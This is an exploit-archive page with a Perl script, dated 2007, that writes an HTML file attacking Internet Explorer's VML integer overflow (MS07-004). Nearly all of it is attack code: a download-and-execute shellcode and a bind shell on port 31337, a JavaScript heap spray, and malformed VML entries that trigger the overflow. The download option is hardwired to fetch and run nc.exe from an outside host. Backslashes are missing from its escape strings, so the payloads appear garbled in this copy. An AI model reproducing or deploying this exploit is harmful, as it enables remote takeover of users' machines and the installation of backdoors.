[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Internet Explorer VML Download and Execute Exploit (MS07-004)
# Published : 2007-01-17
# Author : pang0
# Previous Title : Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC
# Next Title : MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)
#(c) pang0 // www.tcbilisim.org
#bug found3d by LifeAsaGeek
#thx => o.g. / chaos / sakkure / stansar / xoron
#MS07-004 VML integer overflow exploit
$html = "laz.html";
print "(c) pang0 // www.tcbilisim.orgnbug found3d by LifeAsaGeeknMS07-004 VML integer overflow exploitnusage: perl $0 <shell> <opt>n",
"shell => -b bind(31337)n-d down.exec if selc. -d u must a down addr. n",
"exam: perl $0 -bnexam2: perl $0 -d http://blah.com/nc.exen" and exit if !$ARGV[0];
#down exec
$down =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03".
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74".
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E".
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03".
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C".
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40".
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C".
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC".
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F".
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB".
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83".
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF".
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF".
"$url";
#metasploit 31337 bind shell
$bind =
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x09".
"x7cxdax38x83xebxfcxe2xf4xf5x16x31x75xe1x85x25xc7".
"xf6x1cx51x54x2dx58x51x7dx35xf7xa6x3dx71x7dx35xb3".
"x46x64x51x67x29x7dx31x71x82x48x51x39xe7x4dx1axa1".
"xa5xf8x1ax4cx0exbdx10x35x08xbex31xccx32x28xfex10".
"x7cx99x51x67x2dx7dx31x5ex82x70x91xb3x56x60xdbxd3".
"x0ax50x51xb1x65x58xc6x59xcax4dx01x5cx82x3fxeaxb3".
"x49x70x51x48x15xd1x51x78x01x22xb2xb6x47x72x36x68".
"xf6xaaxbcx6bx6fx14xe9x0ax61x0bxa9x0ax56x28x25xe8".
"x61xb7x37xc4x32x2cx25xeex56xf5x3fx5ex88x91xd2x3a".
"x5cx16xd8xc7xd9x14x03x31xfcxd1x8dxc7xdfx2fx89x6b".
"x5ax2fx99x6bx4ax2fx25xe8x6fx14xa0x51x6fx2fx53xd9".
"x9cx14x7ex22x79xbbx8dxc7xdfx16xcax69x5cx83x0ax50".
"xadxd1xf4xd1x5ex83x0cx6bx5cx83x0ax50xecx35x5cx71".
"x5ex83x0cx68x5dx28x8fxc7xd9xefxb2xdfx70xbaxa3x6f".
"xf6xaax8fxc7xd9x1axb0x5cx6fx14xb9x55x80x99xb0x68".
"x50x55x16xb1xeex16x9exb1xebx4dx1axcbxa3x82x98x15".
"xf7x3exf6xabx84x06xe2x93xa2xd7xb2x4axf7xcfxccxc7".
"x7cx38x25xeex52x2bx88x69x58x2dxb0x39x58x2dx8fx69".
"xf6xacxb2x95xd0x79x14x6bxf6xaaxb0xc7xf6x4bx25xe8".
"x82x2bx26xbbxcdx18x25xeex5bx83x0ax50xf9xf6xdex67".
"x5ax83x0cxc7xd9x7cxdax38";
if ($ARGV[0] eq '-d'){
$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
print "u must start http:// or ftp://n" and exit if !($url =~ /http|ftp/);
}
$shlaz = $bind if $ARGV[0] eq '-b';
#citation to metasploit
sub dongu {
my $data = shift;
my $mode = shift() || 'LE';
my $code = '';
my $idx = 0;
if (length($data) % 2 != 0) {
$data .= substr($data, -1, 1);
}
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
if ($mode eq 'LE') {
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
} else {
$code .= sprintf('%%u%.2x%.2x', $c1, $c2);
}
$idx += 2;
}
return $code;
}
$sh3llz = dongu($shlaz);
#_
$body = <<BODY;
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender"
classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<SCRIPT language="javascript">
shellcode =
unescape("%u9090%u9090$sh3llz");
bigblock = unescape("%u0505%u0505");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<350;i++) memory[i] = block + shellcode;
</script>
<v:rect style='width:120pt;height:80pt' fillcolor="red" >
<v:recolorinfo recolorstate="t" numcolors="97612895">
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
<v/recolorinfo>
</html>
BODY
open H,">$html" or die $! and exit;
print H $body;
# www.Syue.com [2007-01-17]